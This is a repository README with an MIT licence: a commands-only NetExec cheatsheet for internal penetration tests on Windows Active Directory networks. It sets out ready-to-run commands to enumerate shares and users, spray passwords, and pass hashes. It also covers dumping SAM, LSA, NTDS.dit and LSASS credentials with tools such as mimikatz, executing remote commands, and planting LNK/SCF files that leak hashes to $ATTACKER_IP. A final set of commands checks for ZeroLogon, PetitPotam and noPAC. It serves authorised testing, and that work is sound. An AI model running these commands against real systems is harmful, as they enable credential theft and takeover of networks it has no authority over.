├── LICENSE └── README.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 BlackWasp 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NetExec Cheatsheet 2 | 3 | A quick and dirty cheatsheet on the usage of [NetExec](https://github.com/Pennyw0rth/NetExec), without lots of explications, only commands. The purpose of this page is to provide the basic commands for the essential operations during an internal pentest. 4 | 5 | If you need more detailed documentation, please refer to the [**official NetExec wiki**](https://www.netexec.wiki/). 6 | 7 | And obviously, if you need more complete cheatsheets with most of the attacks to perform in Active Directory environments, take a look to [my other contents](https://hideandsec.sh/books/cheatsheets-82c). 8 | 9 | ## Enumeration 10 | 11 | ### Network 12 | 13 | `netexec smb $TARGETS` 14 | 15 | ### Shares 16 | 17 | `netexec smb $TARGETS -u $USERNAME -p $PASS --shares` 18 | 19 | ### Specific files in shares 20 | 21 | A module for searching network shares:spider_plus. Running the module without any options (on a /24, for example) will produce a JSON output for each server, containing a list of all files (and some info), but without their contents. Then grep on extensions (conf, ini...) or names ($PASS .. ) to identify an interesting file to search: 22 | 23 | `netexec smb $TARGETS -u $USERNAME -p $PASS -M spider_plus` 24 | 25 | Then, when identifying a lot of interesting files, to speed up the search, dump this on the attacker machine by adding the -o READ_ONLY=False option after the -M spider_plus (but avoid /24, otherwise it'll take a long time). In this case, NetExec will create a folder with the machine's IP, and all the folders/files in it. 26 | 27 | `netexec smb $TARGETS -u $USERNAME -p $PASS -M spider_plus -o READ_ONLY=False` 28 | 29 | ### Sessions 30 | 31 | `netexec $TARGETS -u $USERNAME -p $PASS --sessions` 32 | 33 | ### Disk 34 | 35 | `netexec smb $TARGETS -u $USERNAME -p $PASS --disks` 36 | 37 | ### Users 38 | 39 | Logged : `netexec smb $TARGETS -u $USERNAME -p $PASS --loggedon-users` 40 | 41 | Domain : `netexec smb $TARGETS -u $USERNAME -p $PASS --users` 42 | 43 | Via RID Cycling : `netexec smb $TARGETS -u $USERNAME -p $PASS --rid-brute` 44 | 45 | ### Groups 46 | 47 | Domain : `netexec smb $TARGETS -u $USERNAME -p $PASS --groups` 48 | 49 | Local : `netexec smb $TARGETS -u $USERNAME -p $PASS --local-groups` 50 | 51 | ### Password policy 52 | 53 | `netexec smb $DC -u $USERNAME -p $PASS --pass-pol` 54 | 55 | ## Check credentials 56 | 57 | ### User + pass 58 | 59 | `netexec smb $TARGETS -u $USERNAME -p $PASS` 60 | 61 | ### User + hash 62 | 63 | `netexec smb $TARGETS -u $USERNAME -H 'LM:NT'` 64 | 65 | `netexec smb $TARGETS -u $USERNAME -H 'NTHASH'` 66 | 67 | ### Null session 68 | 69 | `netexec smb $TARGETS -u '' -p ''` 70 | 71 | ### Password spraying 72 | 73 | `netexec smb $TARGET -u $USERNAME user2 user3 -p Summer18` 74 | 75 | `netexec smb $TARGET -u $USERNAME -p $PASS1 $PASS2 $PASS3` 76 | 77 | `netexec smb $TARGET -u /path/to/users.txt -p Summer18` 78 | 79 | `netexec smb $TARGET -u $USERNAME -p /path/to/$PASSs.txt` 80 | 81 | To continue spraying after success : 82 | 83 | `netexec smb $TARGET -u /path/to/users.txt -p Summer18 --continue-on-success` 84 | 85 | ### Local authentication 86 | 87 | `netexec smb $TARGETS -u $USERNAME -p $PASS --local-auth` 88 | 89 | ## Dump credentials 90 | 91 | ### SAM 92 | 93 | `netexec smb $TARGETS -u $USERNAME -p $PASS --sam` 94 | 95 | ### LSA 96 | 97 | `netexec smb $TARGETS -u $USERNAME -p $PASS --lsa` 98 | 99 | ### NTDS.dit 100 | 101 | `netexec smb $DC -u $USERNAME -p $PASS --ntds #Via RPC` 102 | 103 | `netexec smb $DC -u $USERNAME -p $PASS --ntds vss #Via VSS` 104 | 105 | ### LSASS 106 | 107 | `netexec smb $TARGET -u $USERNAME -p $PASS -M lsassy` 108 | 109 | `netexec smb $TARGET -u $USERNAME -p $PASS -M nanodump` 110 | 111 | `netexec smb $TARGET -u $USERNAME -p $PASS -M mimikatz` 112 | 113 | `netexec smb $TARGET -u $USERNAME -p $PASS -M procdump` 114 | 115 | ### LAPS password 116 | 117 | `netexec ldap $DC -u $TARGET -p $PASS -M laps -o computer=$TARGET` 118 | 119 | ## Command execution 120 | 121 | ### Via CMD 122 | 123 | `netexec $TARGET -u Administrator -p $PASS -x whoami` 124 | 125 | ### Via PowerShell 126 | 127 | `netexec $TARGET -u Administrator -p $PASS -X '$PSVersionTable'` 128 | 129 | ## Write a leak file 130 | 131 | ### LNK 132 | 133 | `netexec smb $TARGETS -u $USERNAME -p $PASS -M slinky -o SERVER=$ATTACKER_IP -o NAME=` 134 | 135 | ### SCF 136 | 137 | `netexec smb $TARGETS -u $USERNAME -p $PASS -M scuffy -o SERVER=$ATTACKER_IP -o NAME=` 138 | 139 | ## Search for CVE 140 | 141 | ### ZeroLogon 142 | 143 | `netexec smb $DC -u '' -p '' -M zerologon` 144 | 145 | ### PetitPotam 146 | 147 | `netexec smb $DC -u '' -p '' -M petitpotam` 148 | 149 | ### noPAC 150 | 151 | `netexec smb $DC -u $USERNAME -p $PASS -M nopac` 152 | --------------------------------------------------------------------------------